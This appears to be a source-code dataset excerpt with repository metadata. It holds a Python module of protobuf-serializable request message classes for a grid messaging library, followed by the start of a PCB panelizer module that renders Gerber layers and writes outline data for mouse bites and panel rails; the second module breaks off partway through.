23a0d1442d3d901b1139aeabe079ccf4177ebc0d
|
[
"Apache-2.0"
] | null | null | null |
# stdlib
import json
from typing import Any
from typing import Dict
from typing import List
from typing import Optional
# third party
from google.protobuf.reflection import GeneratedProtocolMessageType
from typing_extensions import final
# relative
from ...... import serialize
from ......proto.grid.messages.request_messages_pb2 import (
CreateRequestMessage as CreateRequestMessage_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
CreateRequestResponse as CreateRequestResponse_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
DeleteRequestMessage as DeleteRequestMessage_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
DeleteRequestResponse as DeleteRequestResponse_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
GetRequestMessage as GetRequestMessage_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
GetRequestResponse as GetRequestResponse_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
GetRequestsMessage as GetRequestsMessage_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
GetRequestsResponse as GetRequestsResponse_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
UpdateRequestMessage as UpdateRequestMessage_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
UpdateRequestResponse as UpdateRequestResponse_PB,
)
from .....common.message import ImmediateSyftMessageWithReply
from .....common.message import ImmediateSyftMessageWithoutReply
from .....common.serde.deserialize import _deserialize
from .....common.serde.serializable import serializable
from .....common.uid import UID
from .....io.address import Address
@serializable()
@final
class CreateRequestMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
content: Dict,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
self.content = content
def _object2proto(self) -> CreateRequestMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: CreateRequestMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return CreateRequestMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
content=json.dumps(self.content),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: CreateRequestMessage_PB,
) -> "CreateRequestMessage":
"""Creates a CreateRequestMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: CreateRequestMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return CreateRequestMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
content=json.loads(proto.content),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return CreateRequestMessage_PB
@serializable()
@final
class CreateRequestResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
content: Dict,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.content = content
def _object2proto(self) -> CreateRequestResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: SignalingOfferMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return CreateRequestResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
content=json.dumps(self.content),
)
@staticmethod
def _proto2object(
proto: CreateRequestResponse_PB,
) -> "CreateRequestResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: SignalingOfferMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return CreateRequestResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
content=json.loads(proto.content),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return CreateRequestResponse_PB
@serializable()
@final
class GetRequestMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
request_id: str,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
self.request_id = request_id
def _object2proto(self) -> GetRequestMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: GetRequestMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return GetRequestMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
request_id=json.dumps(self.request_id),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: GetRequestMessage_PB,
) -> "GetRequestMessage":
"""Creates a GetRequestMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: GetRequestMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return GetRequestMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
request_id=json.loads(proto.request_id),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return GetRequestMessage_PB
@serializable()
@final
class GetRequestResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
request_id: Dict[str, Any],
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.request_id = request_id
def _object2proto(self) -> GetRequestResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: SignalingOfferMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return GetRequestResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
request_id=json.dumps(self.request_id),
)
@staticmethod
def _proto2object(
proto: GetRequestResponse_PB,
) -> "GetRequestResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: SignalingOfferMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return GetRequestResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
request_id=json.loads(proto.request_id),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return GetRequestResponse_PB
@serializable()
@final
class GetRequestsMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
def _object2proto(self) -> GetRequestsMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: GetRequestsMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return GetRequestsMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: GetRequestsMessage_PB,
) -> "GetRequestsMessage":
"""Creates a GetRequestsMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: GetRequestsMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return GetRequestsMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return GetRequestsMessage_PB
@serializable()
@final
class GetRequestsResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
content: List[Dict],
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.content = content
def _object2proto(self) -> GetRequestsResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: SignalingOfferMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
msg = GetRequestsResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
)
for content in self.content:
msg.content.append(serialize(content))
return msg
@staticmethod
def _proto2object(
proto: GetRequestsResponse_PB,
) -> "GetRequestsResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: SignalingOfferMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return GetRequestsResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
content=[_deserialize(content) for content in proto.content],
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return GetRequestsResponse_PB
@serializable()
@final
class UpdateRequestMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
request_id: str,
status: str,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
self.request_id = request_id
self.status = status
def _object2proto(self) -> UpdateRequestMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: UpdateRequestMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return UpdateRequestMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
request_id=json.dumps(self.request_id),
status=json.dumps(self.status),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: UpdateRequestMessage_PB,
) -> "UpdateRequestMessage":
"""Creates a UpdateRequestMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: UpdateRequestMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return UpdateRequestMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
request_id=json.loads(proto.request_id),
status=json.loads(proto.status),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return UpdateRequestMessage_PB
@serializable()
@final
class UpdateRequestResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
status: str,
request_id: str,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.status = status
self.request_id = request_id
def _object2proto(self) -> UpdateRequestResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: SignalingOfferMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return UpdateRequestResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
status=json.dumps(self.status),
request_id=json.dumps(self.request_id),
)
@staticmethod
def _proto2object(
proto: UpdateRequestResponse_PB,
) -> "UpdateRequestResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: SignalingOfferMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return UpdateRequestResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
request_id=json.loads(proto.request_id),
status=json.loads(proto.status),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return UpdateRequestResponse_PB
@serializable()
@final
class DeleteRequestMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
request_id: str,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
self.request_id = request_id
def _object2proto(self) -> DeleteRequestMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: DeleteRequestMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return DeleteRequestMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
request_id=json.dumps(self.request_id),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: DeleteRequestMessage_PB,
) -> "DeleteRequestMessage":
"""Creates a DeleteRequestMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: DeleteRequestMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return DeleteRequestMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
request_id=json.loads(proto.request_id),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return DeleteRequestMessage_PB
@serializable()
@final
class DeleteRequestResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
request_id: str,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.request_id = request_id
def _object2proto(self) -> DeleteRequestResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: SignalingOfferMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return DeleteRequestResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
request_id=json.dumps(self.request_id),
)
@staticmethod
def _proto2object(
proto: DeleteRequestResponse_PB,
) -> "DeleteRequestResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: SignalingOfferMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return DeleteRequestResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
request_id=json.loads(proto.request_id),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return DeleteRequestResponse_PB
| 40.851036
| 92
| 0.675683
| 3,658
| 31,537
| 5.715965
| 0.041279
| 0.033478
| 0.017217
| 0.015304
| 0.851691
| 0.844947
| 0.838204
| 0.838204
| 0.834091
| 0.807356
| 0
| 0.001297
| 0.266639
| 31,537
| 771
| 93
| 40.904021
| 0.902759
| 0.491423
| 0
| 0.653333
| 1
| 0
| 0.014406
| 0.004654
| 0
| 0
| 0
| 0
| 0
| 1
| 0.106667
| false
| 0
| 0.064
| 0
| 0.277333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c068031093fb5e76e9cac4f5afb5226a3803ef65
| 34,182
|
py
|
Python
|
PcbFile.py
|
halfmarble/halfmarble-panelizer
|
73489a0b5d0d46e6d363f6d14454d91fab62f8e3
|
[
"MIT"
] | null | null | null |
PcbFile.py
|
halfmarble/halfmarble-panelizer
|
73489a0b5d0d46e6d363f6d14454d91fab62f8e3
|
[
"MIT"
] | 5
|
2022-01-15T13:32:54.000Z
|
2022-01-30T15:18:15.000Z
|
PcbFile.py
|
halfmarble/halfmarble-panelizer
|
73489a0b5d0d46e6d363f6d14454d91fab62f8e3
|
[
"MIT"
] | null | null | null |
# The MIT License (MIT)
# Copyright 2021,2022 HalfMarble LLC
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import os
import math
from os.path import join
from kivy.uix.image import Image
from kivy.graphics import Scale, Rectangle, Line
import Utilities
from hm_gerber_tool import PCB
from hm_gerber_tool.render import theme
from hm_gerber_tool.layers import PCBLayer
from hm_gerber_tool.render import GerberCairoContext, theme
from hm_gerber_tool.common import rs274x
from hm_gerber_tool.common import excellon
from Constants import *
from Utilities import *
from OffScreenImage import *
def log_text(progressbar, text=None, value=None):
if progressbar is not None:
Utilities.update_progressbar(progressbar, text, value)
elif text is not None:
print(text)
def generate_pcb_data_layers(cwd, pcb_rel_path, data_rel_path, progressbar=None, board_name=None):
pcb_path = os.path.abspath(os.path.join(cwd, pcb_rel_path))
data_path = os.path.abspath(os.path.join(cwd, data_rel_path))
progressbar_value = 0.1
try:
os.mkdir(data_path)
except FileExistsError:
pass
print('\n')
if board_name is None:
board_name = pcb_path
text = 'Reading PCB \"{}\"'.format(board_name)
log_text(progressbar, text, progressbar_value)
pcb = PCB.from_directory(pcb_path, verbose=True)
if pcb is None:
return
print('\n')
progressbar_value = 0.25
for layer in pcb.layers:
text = 'Found layer \"{}\"'.format(layer.name())
log_text(progressbar, text, progressbar_value)
print('\n')
bounds = pcb.board_bounds
get_outline = True
clip_to_outline = False
print_outline = False
size = bounds_to_size(bounds)
resolution = size_to_resolution(size, PIXELS_PER_MM, PIXELS_SIZE_MIN, PIXELS_SIZE_MAX)
ctx = GerberCairoContext(resolution)
if get_outline:
file_path = os.path.join(data_path, 'edge_cuts_mask')
layer = pcb.edge_cuts_layer
if layer is not None:
text = 'Rendering mask for layer \"{}\"'.format(layer.name())
progressbar_value = 0.5
log_text(progressbar, text, progressbar_value)
outline_str = ctx.get_outline_mask(layer, file_path, bounds=bounds, verbose=False)
if print_outline and outline_str is not None:
print('\n{}'.format(outline_str))
layers = pcb.layers
progressbar_advance = 0.5 / len(layers)
for layer in pcb.layers:
file_path = os.path.join(data_path, '{}'.format(layer.name()))
text = 'Rendering layer \"{}\"'.format(layer.name())
log_text(progressbar, text, progressbar_value)
progressbar_value += progressbar_advance
ctx.render_clipped_layer(layer, clip_to_outline, file_path, theme.THEMES['Mask'], bounds=bounds,
background=False, verbose=False)
log_text(progressbar, 'Done', 1.0)
print('\n')
def generate_float46(value):
data = ''
float_full_str = '{:0.6f}'.format(value)
segments = float_full_str.split('.')
for s in segments:
data += '{}'.format(s)
return data
# converts from:
# X14410952Y3047620D02*
# to code like:
# data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.4110), generate_float46(oy+3.0476))
# suitable for generate_*_text_data functions
def convert_grbl_to_code(path, file_name, offset_x, offset_y):
file = load_file(path, file_name)
segments = file.split("\n")
for s in segments:
s = s.replace('X', ' ').replace('Y', ' ').replace('D', ' ')
parts = s.split(" ")
#print('s: {}'.format(s))
#print('parts: {}'.format(parts))
x = parts[1]
x = insert_str(x, '.', len(x) - 6)
x = str_to_float(x) - offset_x
x = '{:+0.4f}'.format(x)
y = parts[2]
y = insert_str(y, '.', len(y) - 6)
y = str_to_float(y) - offset_y
y = '{:+0.4f}'.format(y)
d = parts[3]
print(' data += \'X{{}}Y{{}}D{}\\n\'.format(generate_float46(ox{}), generate_float46(oy{}))'.format(d, x, y))
def generate_mouse_bite_gm1_data(origin, size, arc, close):
min_x = origin[0]
min_y = origin[1]
max_x = min_x+size[0]
max_y = min_y+size[1]
data = ''
data += '%TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '%TF.SameCoordinates,Original*%\n'
data += '%TF.FileFunction,Profile,NP*%\n'
data += '%TF.ProjectId,hm-PanelMouseBite,0,0*%\n'
data += '%FSLAX46Y46*%\n'
data += 'G04 Gerber Fmt 4.6, Leading zero omitted, Abs format (unit mm)*\n'
data += 'G04 Created by {}*\n\n'.format(APP_STR)
data += '%MOMM*%\n'
data += '%LPD*%\n\n'
data += 'G04 APERTURE LIST*\n'
data += '%TA.AperFunction,Profile*%\n'
data += '%ADD10C,0.100000*%\n'
data += '%TD*%\n'
data += 'G04 APERTURE END LIST*\n'
data += 'D10*\n\n'
data += 'G04 mouse bite left bottom arc*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x), generate_float46(min_y))
data += 'G75*\n'
data += 'G03*\n'
data += 'X{}Y{}I{}J{}D01*\n\n'.format(generate_float46(min_x+arc), generate_float46(min_y+arc),
generate_float46(0), generate_float46(arc))
data += 'G04 mouse bite left connect arcs line*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x+arc), generate_float46(min_y+arc))
data += 'X{}Y{}D01*\n\n'.format(generate_float46(min_x+arc), generate_float46(max_y-arc))
data += 'G04 mouse bite left top arc*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x+arc), generate_float46(max_y-arc))
data += 'G75*\n'
data += 'G03*\n'
data += 'X{}Y{}I{}J{}D01*\n\n'.format(generate_float46(min_x), generate_float46(max_y),
generate_float46(-arc), generate_float46(0))
data += 'G04 mouse bite right bottom arc*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(max_x), generate_float46(min_y))
data += 'G75*\n'
data += 'G02*\n'
data += 'X{}Y{}I{}J{}D01*\n\n'.format(generate_float46(max_x-arc), generate_float46(min_y+arc),
generate_float46(0), generate_float46(arc))
data += 'G04 mouse bite right connect arcs line*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(max_x-arc), generate_float46(min_y+arc))
data += 'X{}Y{}D01*\n\n'.format(generate_float46(max_x-arc), generate_float46(max_y-arc))
data += 'G04 mouse bite right top arc*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(max_x-arc), generate_float46(max_y-arc))
data += 'G75*\n'
data += 'G02*\n'
data += 'X{}Y{}I{}J{}D01*\n\n'.format(generate_float46(max_x), generate_float46(max_y),
generate_float46(arc), generate_float46(0))
if close:
data += 'G04 mouse bite closing gap at top/bottom*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x), generate_float46(min_y))
data += 'X{}Y{}D01*\n\n'.format(generate_float46(max_x), generate_float46(min_y))
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x), generate_float46(max_y))
data += 'X{}Y{}D01*\n\n'.format(generate_float46(max_x), generate_float46(max_y))
data += 'M02*\n'
return data
def generate_rail_gm1_data(origin, size, panels, gap, vcut):
min_x = origin[0]
min_y = origin[1]
max_x = min_x+size[0]
max_y = min_y+size[1]
width = size[0]
data = ''
data += '%TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '%TF.SameCoordinates,Original*%\n'
data += '%TF.FileFunction,Profile,NP*%\n'
data += '%TF.ProjectId,hm-PanelRail,0,0*%\n'
data += '%FSLAX46Y46*%\n'
data += 'G04 Gerber Fmt 4.6, Leading zero omitted, Abs format (unit mm)*\n'
data += 'G04 Created by {}*\n\n'.format(APP_STR)
data += '%MOMM*%\n'
data += '%LPD*%\n\n'
data += 'G04 APERTURE LIST*\n'
data += '%TA.AperFunction,Profile*%\n'
data += '%ADD10C,0.100000*%\n'
data += '%TD*%\n'
data += 'G04 APERTURE END LIST*\n'
data += 'D10*\n\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x), generate_float46(min_y))
data += 'X{}Y{}D01*\n'.format(generate_float46(max_x), generate_float46(min_y))
data += 'X{}Y{}D02*\n'.format(generate_float46(max_x), generate_float46(min_y))
